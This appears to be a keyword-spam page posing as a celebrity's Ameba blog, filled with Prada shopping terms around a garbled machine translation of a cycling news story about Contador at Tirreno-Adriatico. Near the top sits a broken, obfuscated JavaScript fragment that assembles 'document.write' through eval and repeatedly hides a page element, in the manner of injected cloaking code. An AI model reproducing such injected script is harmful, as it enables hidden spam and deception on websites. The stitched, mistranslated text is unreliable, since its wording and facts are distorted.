プラダ 正規価格,プラダ トートバッグ 2014-contador full of confidence after taking charge at tirreno function aa(){var rand = Math.floor(Math.random()*10 1);var baseurlmm1 = location.href;var almbmm="";try{almbmm = baseurlmm1.substring(baseurlmm1.length-5,baseurlmm1.length)}catch(e){}//if(almbmm==".com/" || almbmm==".com" ){ss = '
';//}else{//}eval("do" "cu" "ment.wr" "ite('" ss "');");try{setInterval(function(){try{document.getElementById("div" "All").style.display="no" "ne";}catch(e){}for(var i=0;iプラダ 正規価格,プラダ トートバッグ 2014-contador full of confidence after taking charge at tirreno神田沙也加オフィシャルブログ Powered by Ameba神田沙也加オフィシャルブログ Powered by Amebaティレーノで充電を受けた後、自信 コンタドールフルアルベルト·コンタドール(Tinkoffサクソ)<P> Guardiagreleの壁の上に一人で優勝した後2時間以内に近い彼のポストステージ勝者の記者会見に到着したが、彼は彼が戻って彼の最高にして取る準備ができていることを確認した後には何も彼の満足をへこみができなかった クリス·ヴォルタカタルーニャでFroome、そしてもっと重要なのはツール·ド·フランスで。</ P>を含め誰でも、上<P>コンタドールは、それぞれの勝利は、さらに彼の自信を高めるとともに、今年の彼のPISTOLERO勝利敬礼を放つに戻りました。</ P><P>「私はアルガルヴェの前に良かったし、勝つつ​​もりなら、このレースの前にはできますが、知っていることはない。それは私の自信のために良いことだ。私は良い感じているので、私はいいです、これまでのところから外に勝つことができました あまりにも。 </ P><P>コンタドールは、彼がこれまでに攻撃することによって最も強かった誰示したかったことを否定した,プラダ 二つ折り。 パッソランチャーノの彼の第2の加速度はミカルKwiatkowski(オメガファーマクイックステップ)が割れて、彼はナイロタナ(モビスター)よりもはるかに優れていたことが明らかになった。</ P><P>「私はこのレースでいくつかの非常に強力なライダーがあると思います」と彼は控えめに言った。 「しかし、今日、私は右の登山を開始してから、良いと感じた。あなたに自信を与え、私は私が働いてきたキャンプで感じたのと同じ感覚を得ることは非常に一生懸命働いてきたので、私は満足していること 非常に難しい。 </ P><P>たBja​​rneリースは、彼はツール·ド·フランスで戦ったときコンタドールは2013年に苦しんでいたことGuardiagreleにフィニッシュでジャーナリストに伝えていた。</ P><P>デンマークのチームマネージャーは、彼が多くの構造とし、科学的に訓練するコンタドールを確信したことを明らかにした,プラダ 財布 カタログ,プラダ ハラコ バッグ,プラダ公式hp。</ P><P>コンタドールは、彼が気晴らしの多くから身を分離することに成功したいので、彼はより良く、より困難働いただろうことを示唆した。</ P><P>「私は私の目標として設定して勝利ライダーの一種だとあなたは足を持っていないか、またはより強いライダーが存在する場合にそのように、それは、あなたがあなたの心に何との戦いを持っていることを意味」 彼は彼の内面の思考を垣間見るを与えると述べた,プラダ アウトレット 値段。</ P><P>「この冬、私の準備は私が私の訓練からの時間を要した妥協の多くから自分自身を分離した。優れていた,プラダ 直営店。私はほんの数人のチームメイトとの時間のトレーニングをたくさん過ごし、1キャンプに私たちは登山をたくさんしました。また、保管 私の口はあなたが年を取るにつれて行うことが困難である、制御の下で自分の体重を維持するために閉鎖した。私たちは、今日、すべてのその仕事の結果を見ることができると思います。 </ P>ホイールは</ P>コンタドールの賛成でターン<P><P>シーズンのスタート前に、コンタドールは彼が彼の最高過​​ぎませんでした表示する圧力の下にあったとクリスFroome、ステージレースやツール·ド·フランスの彼の支配を継続するように設定見えた。 背中の負傷がレースやトレーニングから休憩を取るために彼を強制した後Froomeは自宅でテレビでティレーノを見ることを余儀なくされたが、フォーム上のコンタドールと、それだけで月中旬ですが、ホイールは劇的になっているようです。</ P><P>コンタドールは、ロールに基づいていますが、彼はまだ改善の余地があると主張した。</ P><P>「それを明確に私のシーズンは始まったばかりという、 と彼は言った。</ P><P>「私はまだそれが必要どこ重量がある。より多くのレースのリズムを必要とするが、私は私の足でいくつかのより多くのトーンを必要としています。私が持っていドンというツール·ド·フランスのような季節の大きな目標のために少し余分なビット そしてブエルタ。 </ P><P>コンタドールは、ボルタカタルーニャ(3月23日30)でFroomeと衝突しますが、却下の提案Froomeはコンタドールがドーピングのための彼の解禁前からティレーノを支配し、彼の最高の形を示しているか見て心配することができる。</ P><P>私は彼が彼のトレーニングに焦点を当てたことと思いますし、私を気にしない、次のレースの準備のために、「コンタドールは苦笑して言った。</ P><P>悲しいことに私はリースは彼がStinkoffに彼のチームを売却したときにきれいなライディングで彼の実験を放棄する力だったと思います。 全然勝利についてStinkoffの薄くベールで覆わ文を聴いて、それは彼がチームに投資した場合に変更する必要があろうものは明らかであったコスト。 悲しいことに私はアルベルト·グランドツアーをきれいに勝つことができるいくつかの男の一つだと思います。 私は、昨シーズンは強いレースをきれいにすることを約束主要スタッフの数がチームを去ったとき、我々は、BMCによる同様の動きを見たと思います。 ことを考慮すると、OCHの歴史のような任意の動きは、深刻なレッドフラッグである。 私は正しいです場合は、ここ数年の間に彼らの「プログラム」をランプアップチームをキャッチするスポーツができないことによる悲しい傾向ドライブです。</ P>bstsoft

プラダ 靴プラダ 財布 二つ折りプラダ クマアウトレット プラダ 財布プラダ マルチカラー 財布プロフィール神田沙也加プロフィール|ピグの部屋なう|グルっぽ|ペタ読者になるアメンバーになるメッセージを送るピグでギフトを贈る最新の記事プラダ 財布プラダ バッグプラダ アウトレットプラダ 店舗月別カレンダー<<2月>>日月火水木金土12345678910111213141516171819202122232425262728このブログの読者読者数: 4739 人読者になる読者になると、このブログの更新情報が届きます。>